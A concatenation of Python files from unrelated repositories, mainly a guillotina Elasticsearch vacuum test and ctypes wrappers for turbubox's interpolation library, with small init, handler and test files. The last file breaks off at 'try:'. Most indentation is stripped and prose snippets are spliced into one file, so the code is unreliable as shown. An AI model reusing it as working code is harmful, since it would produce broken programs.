resp1, _ = await requester(
"POST",
"/db/guillotina/",
data=json.dumps({"@type": "Folder", "id": "foobar"}),
)
resp2, _ = await requester(
"POST",
"/db/guillotina/foobar",
data=json.dumps({"@type": "Folder", "id": "foobar"}),
)
resp3, _ = await requester(
"POST",
"/db/guillotina/foobar/foobar",
data=json.dumps({"@type": "Folder", "id": "foobar"}),
)
container, request, txn, tm = await setup_txn_on_container(requester)
search = get_utility(ICatalogUtility)
index_name = await search.get_container_index_name(container)
async def _test():
assert await search.get_doc_count(container) == 3
result = await search.get_connection().get(
index=index_name, doc_type="_all", id=resp3["@uid"]
)
assert result is not None
await run_with_retries(_test, requester)
# mess with index data to make it look like it was moved
await search.get_connection().update(
index=index_name,
id=resp1["@uid"],
doc_type=DOC_TYPE,
body={
"doc": {
"path": "/moved-foobar",
"parent_uuid": "FOOOBBAR MOVED TO NEW PARENT",
}
},
)
await search.get_connection().update(
index=index_name,
id=resp2["@uid"],
doc_type=DOC_TYPE,
body={"doc": {"path": "/moved-foobar/foobar"}},
)
await search.get_connection().update(
index=index_name,
id=resp3["@uid"],
doc_type=DOC_TYPE,
body={"doc": {"path": "/moved-foobar/foobar/foobar"}},
)
async def _test():
result = await search.get_connection().get(
index=index_name,
doc_type="_all",
id=resp3["@uid"],
stored_fields="path",
)
assert result["fields"]["path"] == ["/moved-foobar/foobar/foobar"]
result = await search.get_connection().get(
index=index_name,
doc_type="_all",
id=resp1["@uid"],
stored_fields="path,parent_uuid",
)
assert result["fields"]["path"] == ["/moved-foobar"]
assert result["fields"]["parent_uuid"] == ["FOOOBBAR MOVED TO NEW PARENT"]
await run_with_retries(_test, requester)
await asyncio.sleep(2)
vacuum = Vacuum(txn, tm, container)
await vacuum.setup()
await vacuum.check_missing()
assert len(vacuum.orphaned) == 0
assert len(vacuum.missing) == 1
await asyncio.sleep(2)
async def __test():
result = await search.get_connection().get(
index=index_name,
doc_type="_all",
id=resp3["@uid"],
stored_fields="path,parent_uuid",
)
assert result["fields"]["path"] == ["/foobar/foobar/foobar"]
result = await search.get_connection().get(
index=index_name,
doc_type="_all",
id=resp1["@uid"],
stored_fields="path,parent_uuid",
)
assert result["fields"]["path"] == ["/foobar"]
assert (
result["fields"]["parent_uuid"] != "FOOOBBAR MOVED TO NEW PARENT"
) # noqa
await run_with_retries(__test, requester)
await tm.abort(txn=txn)
@pytest.mark.skipif(DATABASE == "DUMMY", reason="Not for dummy db")
async def test_vacuum_with_multiple_containers(es_requester):
async with es_requester as requester:
# create another container, force to iterate differently
_, status = await requester(
"POST", "/db", data=json.dumps({"@type": "Container", "id": "foobar"})
)
assert status == 200
await add_content(requester, num_items=100)
search = get_utility(ICatalogUtility)
container, request, txn, tm = await setup_txn_on_container(requester)
task_vars.request.set(request)
vacuum = Vacuum(txn, tm, container)
await vacuum.setup()
await vacuum.check_missing()
await vacuum.check_orphans()
async def ___test():
assert await search.get_doc_count(container) == 1010
await run_with_retries(___test, requester)
await tm.abort(txn=txn)
# =========================================================================== #
# activitywatch/filters/__init__.py
# repo: ActivityWatch/activitywatch-old | license: MIT
# =========================================================================== #
from .split import SplitFilter
# =========================================================================== #
# venv/Lib/site-packages/altair/vega/__init__.py
# repo: ajayiagbebaku/NFL-Model | license: MIT
# =========================================================================== #
# flake8: noqa
from .v5 import *
# =========================================================================== #
# weixin/scripts/cron.py
# repo: lionsin/weixin | license: MIT
# =========================================================================== #
import sys
print(sys.path)
print(0)
# This is a comment
# =========================================================================== #
# sandbox/fortran/interpolate.py
# repo: jmark/turbubox | license: MIT
# =========================================================================== #
import numpy as np
import ctypes as ct
from numpy.ctypeslib import ndpointer
import sys
import os
def find_file(fname, paths):
for path in paths:
for root, dirs, files in os.walk(path):
if fname in files:
return os.path.join(root, fname)
raise FileNotFoundError("Cannot find '%s' in any of %s." % (fname, paths))
lib = ct.cdll.LoadLibrary(find_file('libfortinterpolate.so', sys.path))
ptr_int8 = ndpointer(ct.c_int8, flags="C_CONTIGUOUS")
ptr_int32 = ndpointer(ct.c_int32, flags="C_CONTIGUOUS")
ptr_double = ndpointer(ct.c_double, flags="C_CONTIGUOUS")
def carray(ndarray, dtype=None):
return np.require(ndarray, dtype=dtype, requirements=['C','A'])
lib.foo.argtypes = (
ct.c_int32, ct.c_int32, ptr_double, ptr_double,
)
def foo(input):
output = np.zeros_like(input)
lib.foo(
input.shape[0], input.shape[1], carray(input), carray(output),
)
return output
if False:
# =========================================================================== #
# double
# LagrangePolynomial(const double *xs, const int xslen, const int j, const double X);
lib.LagrangePolynomial.restype = ct.c_double
lib.LagrangePolynomial.argtypes = [
ndpointer(ct.c_double, flags="C_CONTIGUOUS"), ct.c_int, ct.c_int, ct.c_double
]
def LagrangePolynomial(xs, j, X):
xs = np.require(xs.ravel(), dtype=np.double, requirements=['C', 'A'])
return lib.LagrangePolynomial(xs, len(xs), int(j), float(X))
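The C routine wrapped above evaluates the j-th Lagrange basis polynomial at X. A pure-Python reference (assuming the standard definition l_j(X) = prod_{m != j} (X - x_m) / (x_j - x_m); the function name here is illustrative) is:

```python
def lagrange_polynomial(xs, j, X):
    # l_j(X) = prod over m != j of (X - x_m) / (x_j - x_m),
    # so l_j(x_k) equals 1 when k == j and 0 otherwise.
    result = 1.0
    for m, xm in enumerate(xs):
        if m != j:
            result *= (X - xm) / (xs[j] - xm)
    return result

# On nodes [0, 1, 2], l_1 is 1 at x_1 and 0 at the other nodes.
vals = [lagrange_polynomial([0.0, 1.0, 2.0], 1, x) for x in (0.0, 1.0, 2.0)]
```

This cardinal property (delta at the interpolation nodes) is what the interpolation routines below exploit.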
# =========================================================================== #
# void
# lagrange_interpolate_2d_RG(
# const int xslen, const double *xs, const double *fs,
# const int Xslen, const double *Xs, double *Fs
# );
lib.lagrange_interpolate_2d_RG.argtypes = [
ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"), ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"), ndpointer(ct.c_double, flags="C_CONTIGUOUS")
]
def lagrange_interpolate_2d_RG(xs, Xs, fs):
shape = fs.shape
xs = np.require(xs.ravel(), dtype=np.double, requirements=['C','A'])
Xs = np.require(Xs.ravel(), dtype=np.double, requirements=['C','A'])
fs = np.require(fs.ravel(), dtype=np.double, requirements=['C','A'])
Fs = np.zeros(len(Xs)**2,dtype=np.double)
Fs = np.require(Fs.ravel(), dtype=np.double, requirements=['C','A','W'])
lib.lagrange_interpolate_2d_RG(len(xs),xs,fs, len(Xs),Xs,Fs)
return Fs.reshape([len(Xs)]*2)
# =========================================================================== #
# void
# lagrange_interpolate_3d_RG(
# const int xslen, const double *xs, const double *fs,
# const int Xslen, const double *Xs, double *Fs
# );
lib.lagrange_interpolate_3d_RG.argtypes = [
ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"), ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"), ndpointer(ct.c_double, flags="C_CONTIGUOUS")
]
def lagrange_interpolate_3d_RG(xs, Xs, fs):
shape = fs.shape
xs = np.require(xs.ravel(), dtype=np.double, requirements=['C','A'])
Xs = np.require(Xs.ravel(), dtype=np.double, requirements=['C','A'])
fs = np.require(fs.ravel(), dtype=np.double, requirements=['C','A'])
Fs = np.zeros(len(Xs)**3,dtype=np.double)
Fs = np.require(Fs.ravel(), dtype=np.double, requirements=['C','A','W'])
lib.lagrange_interpolate_3d_RG(len(xs),xs,fs, len(Xs),Xs,Fs)
return Fs.reshape([len(Xs)]*3)
# =========================================================================== #
t_ndouble = ndpointer(ct.c_double, flags="C_CONTIGUOUS")
t_nint = ndpointer(ct.c_int, flags="C_CONTIGUOUS")
t_int = ct.c_int
# void
# box_to_elements(
# int Nx, int Ny, int Nz, double *boxptr,
# int nelems, int nx, int ny, int nz, double *offsetsptr, double *elemsptr);
lib.box_to_elements.argtypes = [
t_int, t_int, t_int, t_ndouble,
t_int, t_ndouble,
t_int, t_int, t_int, t_ndouble, t_int
]
def box_to_elements(box, flx, neighbors=0):
Nnodes = (np.array(box.shape)//flx.mesh.meshshape)[0]
lls, _ = flx.mesh.get_cell_coords()
offsets = Nnodes * lls / flx.mesh.elemsize
N = Nnodes + 2*neighbors
elems = np.zeros([flx.mesh.nrelems, N,N,N], dtype=np.double)
boxptr = np.require(box.ravel(), dtype=np.double, requirements=['C','A'])
elemsptr = np.require(elems.ravel(), dtype=np.double, requirements=['C','A'])
ofsptr = np.require(offsets.ravel(), dtype=np.double, requirements=['C', 'A'])
lib.box_to_elements(box.shape[0], box.shape[1], box.shape[2], boxptr, flx.mesh.nrelems, ofsptr, elems[0].shape[0], elems[0].shape[1], elems[0].shape[2], elemsptr, neighbors)
return elemsptr.reshape(elems.shape)
# =========================================================================== #
lib.elements_to_box.argtypes = [
t_int, t_int, t_int, t_ndouble,
t_int, t_ndouble,
t_int, t_int, t_int, t_ndouble
]
def elements_to_box(elems, mesh):
# lower left corners normed to unit intervall
lls = (mesh.domain[0] + mesh.elemcoords[0])/mesh.domainsize
box = np.zeros(elems[0].shape * mesh.meshshape)
offsets = np.array(box.shape) * lls
boxptr = np.require(box.ravel(), dtype=np.double, requirements=['C','A'])
elemsptr = np.require(elems.ravel(), dtype=np.double, requirements=['C','A'])
ofsptr = np.require(offsets.ravel(), dtype=np.double, requirements=['C', 'A'])
lib.elements_to_box(box.shape[0], box.shape[1], box.shape[2], boxptr, mesh.nrelems, ofsptr, elems[0].shape[0], elems[0].shape[1], elems[0].shape[2], elemsptr)
return boxptr.reshape(box.shape)
# =========================================================================== #
lib.elements_to_box_fv.argtypes = [
t_int, t_int, t_int, t_ndouble,
t_int, t_ndouble,
t_int, t_int, t_int, t_ndouble,
t_nint
]
def elements_to_box_fv(elems, mesh, box, fvs):
# lower left corners normed to unit intervall
lls = (mesh.domain[0] + mesh.elemcoords[0])/mesh.domainsize
#box = np.zeros(elems[0].shape * mesh.meshshape)
offsets = np.array(box.shape) * lls
boxptr = np.require(box.ravel(), dtype=np.double, requirements=['C','A'])
elemsptr = np.require(elems.ravel(), dtype=np.double, requirements=['C','A'])
ofsptr = np.require(offsets.ravel(), dtype=np.double, requirements=['C', 'A'])
        fvsptr = np.require(fvs.ravel(), dtype=np.int32, requirements=['C','A'])
        lib.elements_to_box_fv(
            box.shape[0], box.shape[1], box.shape[2], boxptr,
            mesh.nrelems, ofsptr,
            elems[0].shape[0], elems[0].shape[1], elems[0].shape[2], elemsptr,
            fvsptr)
        return boxptr.reshape(box.shape)
# =========================================================================== #
lib.box_to_elements_avg_boundaries.argtypes = [
t_int, t_int, t_int, t_ndouble,
t_int, t_ndouble,
t_int, t_int, t_int, t_ndouble
]
def box_to_elements_avg_boundaries(box, flx):
lls, _ = flx.mesh.get_cell_coords()
offsets = (flx.Nout) * lls / flx.mesh.cellsize
N = flx.Nout
elems = np.zeros([flx.mesh.nrelems, N,N,N], dtype=np.double)
boxptr = np.require(box.ravel(), dtype=np.double, requirements=['C','A'])
ofsptr = np.require(offsets.ravel(), dtype=np.double, requirements=['C', 'A'])
elemsptr = np.require(elems.ravel(), dtype=np.double, requirements=['C','A','W'])
lib.box_to_elements_avg_boundaries(box.shape[0], box.shape[1], box.shape[2], boxptr, flx.mesh.nrelems, ofsptr, elems[0].shape[0], elems[0].shape[1], elems[0].shape[2], elemsptr)
return elemsptr.reshape(elems.shape)
# =========================================================================== #
# void
# change_basis_3d(
# const int nelems, const int nn,
# const double *Vdm, const double *fss, double *Fss);
lib.change_basis_3d.argtypes = [
t_int, t_int, t_ndouble, t_ndouble, t_ndouble
]
def change_basis(Vd,fs):
nn,NN = Vd.shape
Fs = np.empty([len(fs)]+3*[NN])
Vdptr = np.require(Vd, dtype=np.double, requirements=['C','A'])
fsptr = np.require(fs, dtype=np.double, requirements=['C','A'])
Fsptr = np.require(Fs, dtype=np.double, requirements=['C','A','W'])
lib.change_basis_3d(
len(fs), NN, Vdptr, fsptr, Fsptr
)
return Fsptr.reshape(Fs.shape)
# =========================================================================== #
# void
# change_basis_3d_2(
# const int nelems, const int nn,
# const double *Vdm, const double *fss, double *Fss);
lib.change_basis_3d_2.argtypes = [
t_int, t_int, t_ndouble, t_ndouble, t_ndouble
]
def change_basis_2(Vd,fs):
nn,NN = Vd.shape
Fs = np.empty([len(fs)]+3*[NN])
Vdptr = np.require(Vd, dtype=np.double, requirements=['C','A'])
fsptr = np.require(fs, dtype=np.double, requirements=['C','A'])
Fsptr = np.require(Fs, dtype=np.double, requirements=['C','A','W'])
lib.change_basis_3d_2(
len(fs), NN, Vdptr, fsptr, Fsptr
)
return Fsptr.reshape(Fs.shape)
# =========================================================================== #
# void
# change_grid_space_2d_2(
# const int nelems,
# const int nx, const int ny,
# const int Nx, const int Ny,
# const double *Lss, const double *fss, double *Fss);
lib.change_grid_space_2d_2.argtypes = [
t_int,
t_int, t_int,
t_int, t_int,
t_ndouble, t_ndouble, t_ndouble
]
def change_grid_space_2d_2(Ls,fs):
sh = Ls.shape
Fs = np.empty([len(fs), sh[0], sh[1]])
Lsptr = np.require(Ls, dtype=np.double, requirements=['C','A'])
fsptr = np.require(fs, dtype=np.double, requirements=['C','A'])
Fsptr = np.require(Fs, dtype=np.double, requirements=['C','A','W'])
lib.change_grid_space_2d_2(
len(fs), sh[2], sh[3], sh[0], sh[1], Lsptr, fsptr, Fsptr
)
return Fsptr.reshape(Fs.shape)
# =========================================================================== #
# void
# change_grid_space_2d(
# const int nelems,
# const int nx, const int ny, const double *xs, double *fss,
# const int Nx, const int Ny, const double *Xs, double *Fss);
lib.change_grid_space_2d.argtypes = [
t_int,
t_int, t_int, t_ndouble, t_ndouble,
t_int, t_int, t_ndouble, t_ndouble
]
def change_grid_space_2d(fs,xs,Xs):
Fs = np.empty([len(fs), len(Xs), len(Xs)])
xsptr = np.require(xs, dtype=np.double, requirements=['C','A'])
Xsptr = np.require(Xs, dtype=np.double, requirements=['C','A'])
fsptr = np.require(fs, dtype=np.double, requirements=['C','A'])
Fsptr = np.require(Fs, dtype=np.double, requirements=['C','A','W'])
lib.change_grid_space_2d(
len(fs),
len(xs), len(xs), xsptr, fsptr,
len(Xs), len(Xs), Xsptr, Fsptr,
)
return Fsptr
# =========================================================================== #
# void
# change_grid_space(
# const int nelems,
# const int nx, const int ny, const int nz ,const double *xs, double *fss,
# const int Nx, const int Ny, const int Nz ,const double *Xs, double *Fss);
lib.change_grid_space.argtypes = [
t_int,
t_int, t_int, t_int, t_ndouble, t_ndouble,
t_int, t_int, t_int, t_ndouble, t_ndouble
]
def change_grid_space(fs,xs,Xs):
Fs = np.empty([len(fs), len(Xs), len(Xs), len(Xs)])
xsptr = np.require(xs, dtype=np.double, requirements=['C','A'])
Xsptr = np.require(Xs, dtype=np.double, requirements=['C','A'])
fsptr = np.require(fs, dtype=np.double, requirements=['C','A'])
Fsptr = np.require(Fs, dtype=np.double, requirements=['C','A','W'])
lib.change_grid_space(
len(fs),
len(xs), len(xs), len(xs), xsptr, fsptr,
len(Xs), len(Xs), len(Xs), Xsptr, Fsptr
)
return Fsptr.reshape(Fs.shape)
# =========================================================================== #
# void
# change_grid_space_dg_fv(
# const int nelems,
# const int nx, const int ny, const int nz ,const double *xs, double *fss,
# const int Nx, const int Ny, const int Nz ,const double *Xs, double *Fss,
# const int *fvs);
lib.change_grid_space_dg_fv.argtypes = [
t_int,
t_int, t_int, t_int, t_ndouble, t_ndouble,
t_int, t_int, t_int, t_ndouble, t_ndouble,
t_nint
]
def change_grid_space_dg_fv(fs,xs,Xs,FV):
Fs = np.empty([len(fs), len(Xs), len(Xs), len(Xs)])
xsptr = np.require(xs, dtype=np.double, requirements=['C','A'])
Xsptr = np.require(Xs, dtype=np.double, requirements=['C','A'])
fsptr = np.require(fs, dtype=np.double, requirements=['C','A'])
Fsptr = np.require(Fs, dtype=np.double, requirements=['C','A','W'])
FVptr = np.require(FV, dtype=np.int32, requirements=['C','A'])
lib.change_grid_space_dg_fv(
len(fs),
len(xs), len(xs), len(xs), xsptr, fsptr,
len(Xs), len(Xs), len(Xs), Xsptr, Fsptr,
FVptr
)
return Fsptr.reshape(Fs.shape)
# =========================================================================== #
# void
# change_grid_space_fv_dg(
# const int nelems,
# const int nx, const int ny, const int nz ,const double *xs, double *fss,
# const int Nx, const int Ny, const int Nz ,const double *Xs, double *Fss,
# const int *fvs);
lib.change_grid_space_fv_dg.argtypes = [
t_int,
t_int, t_int, t_int, t_ndouble, t_ndouble,
t_int, t_int, t_int, t_ndouble, t_ndouble,
t_nint
]
def change_grid_space_fv_dg(fs,xs,Xs,FV):
Fs = np.empty([len(fs), len(Xs), len(Xs), len(Xs)])
xsptr = np.require(xs, dtype=np.double, requirements=['C','A'])
Xsptr = np.require(Xs, dtype=np.double, requirements=['C','A'])
fsptr = np.require(fs, dtype=np.double, requirements=['C','A'])
Fsptr = np.require(Fs, dtype=np.double, requirements=['C','A','W'])
FVptr = np.require(FV, dtype=np.int32, requirements=['C','A'])
lib.change_grid_space_fv_dg(
len(fs),
len(xs), len(xs), len(xs), xsptr, fsptr,
len(Xs), len(Xs), len(Xs), Xsptr, Fsptr,
FVptr
)
return Fsptr.reshape(Fs.shape)
# =========================================================================== #
# deprecated ...
# void
# flash_to_flexi_RG(
# const int xslen, const double *xs, const double *fss,
# const int Xslen, const double *Xs, double *Fss,
# const int oflen, const int *offsets
# );
# flash_to_flexi_RG(
# const int xslen, const double *xs,
# const int Nx, const int Ny, const int Nz, const double *fss,
# const int Xslen, const double *Xs, double *Fss,
# const int oflen, const int *offsets
# )
lib.box_to_flexi.argtypes = [
ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ct.c_int, ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"), ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ndpointer(ct.c_int, flags="C_CONTIGUOUS")
]
def box_to_flexi(xs, Xs, box, flx):
shape = box.shape
# ll ... lower left
# tr ... top right
lls, trs = flx.mesh.get_cell_coords()
Is,Js,Ks = tuple(np.round((flx.Nout) * lls / flx.mesh.cellsize).astype(int).T)
offsets = ((Is * shape[1]) + Js) * shape[2] + Ks
offsets = np.require(offsets.ravel(), dtype=np.int32, requirements=['C', 'A'])
xs = np.require(xs.ravel(), dtype=np.double, requirements=['C', 'A'])
Xs = np.require(Xs.ravel(), dtype=np.double, requirements=['C', 'A'])
box = np.require(box.ravel(), dtype=np.double, requirements=['C', 'A'])
flxdata = np.empty(len(offsets) * len(Xs)**3, dtype=np.double)
flxdata = np.require(flxdata.ravel(), dtype=np.double, requirements=['C', 'A', 'W'])
lib.box_to_flexi(
len(xs), xs,
shape[0], shape[1], shape[2], box,
len(Xs), Xs, flxdata,
len(offsets), offsets)
return flxdata.reshape(len(offsets),*[len(Xs)]*3)
# =========================================================================== #
# void
# box_to_flexi_with_averaged_boundaries(
# const int xslen, const double *xs,
# const int Nx, const int Ny, const int Nz, const double *fss,
# const int Xslen, const double *Xs, double *Fss,
# const int oflen, const int *offsets
# )
# lib.box_to_flexi_with_averaged_boundaries.argtypes = [
# ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
# ct.c_int, ct.c_int, ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
# ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"), ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
# ct.c_int, ndpointer(ct.c_int, flags="C_CONTIGUOUS")
# ]
def box_to_flexi_with_averaged_boundaries(xs, Xs, box, flx):
shape = box.shape
# ll ... lower left
# tr ... top right
lls, trs = flx.mesh.get_cell_coords()
Is,Js,Ks = tuple(np.round((flx.Nout) * lls / flx.mesh.cellsize).astype(int).T)
offsets = ((Is * shape[1]) + Js) * shape[2] + Ks
offsets = np.require(offsets.ravel(), dtype=np.int32, requirements=['C', 'A'])
xs = np.require(xs.ravel(), dtype=np.double, requirements=['C', 'A'])
Xs = np.require(Xs.ravel(), dtype=np.double, requirements=['C', 'A'])
box = np.require(box.ravel(), dtype=np.double, requirements=['C', 'A'])
flxdata = np.empty(len(offsets) * len(Xs)**3, dtype=np.double)
flxdata = np.require(flxdata.ravel(), dtype=np.double, requirements=['C', 'A', 'W'])
lib.box_to_flexi_with_averaged_boundaries(
len(xs), xs,
shape[0], shape[1], shape[2], box,
len(Xs), Xs, flxdata,
len(offsets), offsets)
return flxdata.reshape(len(offsets),*[len(Xs)]*3)
# =========================================================================== #
# void
# flexi_to_box(
# const int xslen, const double *xs,
# const int Xslen, const double *Xs,
# const int nelems, const int *offsets, double *flexi
# const int Nx, const int Ny, const int Nz, const double *box,
# );
lib.flexi_to_box.argtypes = [
ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ndpointer(ct.c_int, flags="C_CONTIGUOUS"), ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ct.c_int, ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS")
]
def flexi_to_box(xs, Xs, flxdata, flx):
        shape = tuple(len(Xs) * flx.mesh.gridsize.astype(int))
# ll ... lower left
# tr ... top right
lls, trs = flx.mesh.get_cell_coords()
Is,Js,Ks = tuple(np.round(sh*ll) for sh,ll in zip(shape,lls.T))
offsets = ((Is * shape[1]) + Js) * shape[2] + Ks
offsets = np.require(offsets.ravel(), dtype=np.int32, requirements=['C', 'A'])
xs = np.require(xs.ravel(), dtype=np.double, requirements=['C', 'A'])
Xs = np.require(Xs.ravel(), dtype=np.double, requirements=['C', 'A'])
flxdata = flxdata.transpose(0,3,2,1)
flxdata = np.require(flxdata.ravel(), dtype=np.double, requirements=['C', 'A'])
box = np.zeros(shape,dtype=np.double)
box = np.require(box.ravel(), dtype=np.double, requirements=['C', 'A', 'W'])
lib.flexi_to_box(
len(xs), xs,
len(Xs), Xs,
len(offsets), offsets, flxdata,
shape[0], shape[1], shape[2], box)
return box.reshape(shape)
# =========================================================================== #
# void
# blocks_to_box(
# const int rlevel, const int nblocks,
# const int *rlevels, const double *coords, const double *domain,
# const int nx, const int ny, const int nz, const double *blocks,
# const int Nx, const int Ny, const int Nz, const double *box
# );
lib.blocks_to_box.argtypes = [
ct.c_int, ct.c_int,
ndpointer(ct.c_int, flags="C_CONTIGUOUS"),
ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ct.c_int, ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ct.c_int, ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
]
def blocks_to_box(rlevel, rlevels, coords, domain, blocks, box):
_rlevels = np.require(np.ravel(rlevels), dtype=np.int32, requirements=['C', 'A'])
_coords = np.require(np.ravel( coords), dtype=np.double, requirements=['C', 'A'])
_domain = np.require(np.ravel( domain), dtype=np.double, requirements=['C', 'A'])
_blocks = np.require(np.ravel( blocks), dtype=np.double, requirements=['C', 'A'])
_box = np.require(np.ravel( box), dtype=np.double, requirements=['C', 'A'])
lib.blocks_to_box(
rlevel, len(_rlevels), _rlevels, _coords, _domain,
blocks.shape[1], blocks.shape[2], blocks.shape[3], _blocks,
box.shape[0], box.shape[1], box.shape[2], _box)
return _box.reshape(box.shape)
# =========================================================================== #
# =========================================================================== #
# =========================================================================== #
ptr_int8 = ndpointer(ct.c_int8, flags="C_CONTIGUOUS")
ptr_int32 = ndpointer(ct.c_int32, flags="C_CONTIGUOUS")
ptr_double = ndpointer(ct.c_double, flags="C_CONTIGUOUS")
def carray(ndarray, dtype=None):
return np.require(ndarray, dtype=dtype, requirements=['C','A'])
lib.morton_to_coords.argtypes = (
ptr_int32, ptr_int8,
ptr_int32, ptr_int32,
ptr_int32, ptr_double,
)
def morton_to_coords(levels, morton):
coords = np.zeros((levels.shape[0],3))
lib.morton_to_coords(
carray(levels.shape, dtype=np.int32), carray(levels),
carray(morton.shape, dtype=np.int32), carray(morton),
carray(coords.shape, dtype=np.int32), carray(coords),
)
return coords
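`morton_to_coords` delegates the Morton (Z-order) decoding to the C library. As an illustration of what such a decode does, here is a pure-Python sketch of 3-D bit de-interleaving; the C implementation's exact refinement-level and scaling handling may differ:

```python
def morton_decode3(code, nbits=21):
    # De-interleave bits: x takes bits 0, 3, 6, ..., y takes bits 1, 4, 7, ...,
    # z takes bits 2, 5, 8, ... of the Morton code.
    x = y = z = 0
    for bit in range(nbits):
        x |= ((code >> (3 * bit)) & 1) << bit
        y |= ((code >> (3 * bit + 1)) & 1) << bit
        z |= ((code >> (3 * bit + 2)) & 1) << bit
    return x, y, z

print(morton_decode3(0b110101))  # (1, 2, 3)
```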
lib.cells_to_image.argtypes = (
ptr_int32, ptr_int8,
ptr_int32, ptr_int32,
ptr_int32, ptr_double,
ptr_int32, ptr_double,
ct.c_int32
)
def cells_to_image(levels, morton, cells, image, method='nearest', gridlines=0):
methods = dict(
nearest = 0,
bilinear = 1,
bicosine = 2,
)
if len(cells.shape) < 2:
cshape = (cells.shape[0], 1,1)
lib.cells_to_image(
carray(levels.shape, dtype=np.int32), carray(levels),
carray(morton.shape, dtype=np.int32), carray(morton),
carray( cshape, dtype=np.int32), carray(cells),
carray( image.shape, dtype=np.int32), carray(image),
methods[str.lower(method)], gridlines
)
else:
lib.cells_to_image(
carray(levels.shape, dtype=np.int32), carray(levels),
carray(morton.shape, dtype=np.int32), carray(morton),
carray( cells.shape, dtype=np.int32), carray(cells),
carray( image.shape, dtype=np.int32), carray(image),
methods[str.lower(method)], gridlines
)
lib.cells_to_image_3d.argtypes = (
ptr_int32, ptr_int8,
ptr_int32, ptr_int32,
ptr_int32, ptr_double,
ptr_int32, ptr_double,
)
def cells_to_image_3d(levels, morton, cells, image):
if len(cells.shape) < 2:
cshape = (cells.shape[0], 1,1,1)
lib.cells_to_image_3d(
carray(levels.shape, dtype=np.int32), carray(levels),
carray(morton.shape, dtype=np.int32), carray(morton),
carray( cshape, dtype=np.int32), carray(cells),
carray( image.shape, dtype=np.int32), carray(image)
)
else:
lib.cells_to_image_3d(
carray(levels.shape, dtype=np.int32), carray(levels),
carray(morton.shape, dtype=np.int32), carray(morton),
carray( cells.shape, dtype=np.int32), carray(cells),
carray( image.shape, dtype=np.int32), carray(image)
)
# =========================================================================== #
lib.cells_to_image_flash_ug_2d.argtypes = (
ptr_int32, ptr_double,
ptr_int32, ptr_double,
ptr_int32, ptr_double,
ptr_int32, ptr_double,
ct.c_int32,
)
def cells_to_image_flash_ug_2d(coords, bsizes, blocks, image, method='nearest'):
methods = dict(
nearest = 0,
bilinear = 1,
bicosine = 2,
)
lib.cells_to_image_flash_ug_2d(
carray(coords.shape, dtype=np.int32), carray(coords),
carray(bsizes.shape, dtype=np.int32), carray(bsizes),
carray(blocks.shape, dtype=np.int32), carray(blocks),
carray( image.shape, dtype=np.int32), carray(image),
methods[str.lower(method)]
)
# =========================================================================== #
lib.cells_to_image_titanic_patch_2d.argtypes = (
ptr_int32, ptr_double,
ptr_int32, ptr_double,
ct.c_int32,
)
def cells_to_image_titanic_patch_2d(blocks, image, method='nearest'):
methods = dict(
nearest = 0,
bilinear = 1,
)
lib.cells_to_image_titanic_patch_2d(
carray(blocks.shape, dtype=np.int32), carray(blocks),
carray( image.shape, dtype=np.int32), carray(image),
methods[str.lower(method)]
)
# =========================================================================== #
# test/api_deployment/lambda.py (vistaprint/TerraformModules, Apache-2.0)
from datetime import datetime
def handler(event, context):
return {'Result': datetime.now().isoformat()}
# =========================================================================== #
# tools/image.py (Dentosal/rust_os, MIT)
import os
os.system("open /Users/Hannes/VirtualBox\ VMs/RustOS/Logs/VBox.png")
# =========================================================================== #
# src/iris/role_lookup/__init__.py (houqp/iris, BSD-2-Clause)
# Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
from iris.custom_import import import_custom_module
def get_role_lookup(config):
return import_custom_module('iris.role_lookup', config['role_lookup'])(config)
# =========================================================================== #
# obsscenetransporter/__init__.py (stblassitude/obs-scene-transporter, MIT)
from obsscenetransporter.scenecollection import ObsStudioSceneCollection, main
# =========================================================================== #
# tests/formatters/test__humanize_date.py (LCBRU/lbrc_flask, MIT)
from datetime import datetime
from lbrc_flask.formatters import humanize_date
def test__humanize_date__None():
assert humanize_date(None) == ''
def test__humanize_date__Datetime():
assert len(humanize_date(datetime.now())) > 0
def test__humanize_date__Date():
assert len(humanize_date(datetime.now().date())) > 0
# =========================================================================== #
# tests/test_aws.py (geometry-labs/substrate-infra-archive, Apache-2.0)
from tackle.main import tackle
from tackle.exceptions import HookCallException
import os
from . import get_deployment_action
def test_api_aws_min(change_base_dir, fixture_dir, tmp_move_deployments):
fixture = os.path.join(fixture_dir, 'api-aws-min.yaml')
create = tackle(overwrite_inputs=fixture, no_input=True)
assert create['create_']['deployment_name'] == "polkadot-aws-prod-2"
tackle(overwrite_inputs=get_deployment_action(fixture, 'plan'), no_input=True)
# Module assumes existing network. Can't deploy.
def test_api_aws_network(change_base_dir, fixture_dir, tmp_move_deployments):
fixture = os.path.join(fixture_dir, 'api-aws-network.yaml')
create = tackle(overwrite_inputs=fixture, no_input=True)
assert create['create_']['deployment_name'] == "polkadot-aws-prod-3"
plan = tackle(overwrite_inputs=get_deployment_action(fixture, 'plan'), no_input=True)
import yaml
with open('scratch.yaml', 'w') as f:
        yaml.dump(plan, f)  # yaml.dump takes (data, stream)
try:
